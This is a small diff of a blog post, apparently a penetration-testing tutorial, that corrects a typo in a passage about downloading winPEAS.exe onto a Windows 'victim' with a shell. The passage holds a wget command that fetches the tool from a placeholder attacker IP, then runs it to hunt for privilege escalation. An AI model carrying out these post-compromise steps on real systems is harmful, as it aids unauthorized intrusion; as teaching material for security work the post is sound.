ribersec/ribersec.github.io/_posts/2020-06-12-Windows-Privilege-Escalation-Tools.md

 Let's say we already have shell on a Windows victim we could start from there to download the winPEAS.exe file with the command below
 <div class="alert-info">wget http://ip/winPEAS.exe -O winPEAS.exe</div>
 ![image](/assets/img/tranfser-winpeas.png)
-As you can see the shell we had does not understand weget.
+As you can see the shell we had does not understand wget.
 So we just type in powershell to get a powershell shell were we can run the wget command.

 Next run the winPEAS.exe and check for anything interesting that could lead to a privilege escalation.